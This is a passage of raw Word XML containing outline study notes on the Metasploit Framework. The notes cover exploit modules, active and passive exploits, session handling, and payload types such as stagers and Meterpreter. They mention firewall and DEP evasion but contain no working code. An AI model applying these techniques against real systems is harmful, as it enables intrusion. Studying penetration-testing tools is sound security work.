    <w:p w14:paraId="49B25561" w14:textId="1D6B6B1D" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">exploits </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF909F5" w14:textId="1AB59244" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B90B40" w14:textId="5D5636F6" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>targets – see which targets are supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87604C" w14:textId="7AA7CA28" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>advanced – fine-tune exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12036083" w14:textId="0476338E" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>encoders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A4916C" w14:textId="69168684" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>nops – display NOP generators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B48980" w14:textId="7B1AB30E" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A540816" w14:textId="20335C02" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5D7B56" w14:textId="1C967C5F" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>use – changes context to a specific module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542DF88A" w14:textId="65AFD121" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>EXPLOITS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F6D1C8" w14:textId="3284953D" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Active Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235E0C0B" w14:textId="7A564ABB" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>exploit a specific host, run until completion, then exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7DE0DE" w14:textId="68E3DFCF" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>brute force exits upon victim shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DEE08" w14:textId="34F30DCD" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>execution stops if error occurs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B653FD8" w14:textId="38000EB8" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>can force into background with -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75418155" w14:textId="5095AF40" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Passive Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19710B23" w14:textId="684A69E6" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>wait for incoming host and exploit upon connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD841C" w14:textId="62BE3629" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>focus on clients such as web browsers, FTP clients, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3630AE31" w14:textId="0D5BB9E2" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>used in conjunction with email exploits, waiting for connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F6C3CF" w14:textId="5FB6C44B" w:rsidR="0048474E" w:rsidRDefault="0048474E" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>passive exploits report shells as they happen, enumerated by passing -l to sessions command</w:t>
      </w:r>
      <w:r w:rsidR="00A75B67">
        <w:t>, -i will interact with a shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01956145" w14:textId="74478B9E" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Using Exploits in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4234E" w14:textId="668B9253" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>selecting an exploit adds the exploit and check commands to the console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137976C3" w14:textId="4C5A83BE" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>SHOW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477CE3B8" w14:textId="0F722D4A" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A403B0A" w14:textId="68448C4D" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C75EFC" w14:textId="0DA469F2" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781108C" w14:textId="6C659C38" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>exploit options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126F9EC" w14:textId="21CCE26F" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C177917" w14:textId="7EF4155F" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4D64B" w14:textId="39F8DD11" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding Payloads in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45A31B" w14:textId="758B4300" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Three Different Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A964285" w14:textId="47A26BE9" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Singles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12A8BB" w14:textId="1439EB21" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Stagers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFE1B65" w14:textId="3EE49442" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62187886" w14:textId="7B13A8B2" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Singles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B9B9E" w14:textId="43362B58" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>self contained and standalone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029AD3B" w14:textId="50E21CE8" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>can be caught with non-metasploit handlers such as netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7BC8A0" w14:textId="79F415F6" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Stagers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB744E" w14:textId="6200BA36" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>setup network connection between the attacker and victim and are designed to be small and reliable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F487CD" w14:textId="6B9D3E8B" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A753949" w14:textId="26658F52" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>payload components that are downloaded by Stagers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213814AF" w14:textId="39E2B56E" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>provide advanced features with no size limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49570138" w14:textId="31FC31D4" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter, vnc injection, ipone shell, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3310548E" w14:textId="4630FEF9" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Payload Types in the Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2807B" w14:textId="781921CB" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Inline (Non Staged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77325F21" w14:textId="72264B2D" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>containing the exploit and full shell code for the selected task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421EEE57" w14:textId="6381C5E8" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>more stable than counterparts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0492447B" w14:textId="1392E902" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>main constraint is size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601A9A0" w14:textId="17F6F157" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Stager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77955791" w14:textId="569EE4D4" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>work in conjunction with stage payloads in order to perform a task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BD89B6" w14:textId="4544AC83" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>establishes comms channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AEAC3" w14:textId="4B209AE9" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE3C2C6" w14:textId="5292DD47" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>resides completely within memory of remote host and leaves no traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673FBEA7" w14:textId="0F239D42" w:rsidR="00A75B67" w:rsidRDefault="00A75B67" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>operating via dll injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62185C19" w14:textId="6CECD857" w:rsidR="00A75B67" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>PassiveX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55347E49" w14:textId="70C2D9C2" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>helps circumvent outbound firewalls using ActiveX to create hidden instance of IE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E28D398" w14:textId="5A34363E" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP reqs and reps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2011C104" w14:textId="398E7CC9" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>NONX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56108D" w14:textId="3D7ECBA8" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>circumvent DEP in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4457D3E2" w14:textId="2776E4C3" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>ORD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1732C7F6" w14:textId="4CBE5E3E" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>windows stager based payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E325155" w14:textId="7756C136" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>works on every version of windows without needing return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563F1E7D" w14:textId="3F1A52FC" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>very tiny</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE5F11" w14:textId="60AF1D05" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>however</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F921FB" w14:textId="48C81594" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>relies on ws2_32.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF0ACA7" w14:textId="7085B19C" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>less stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB9A04" w14:textId="773FADB0" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F74068" w14:textId="6C28CB3A" w:rsidR="0066600F" w:rsidRDefault="0066600F" w:rsidP="00F51289">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
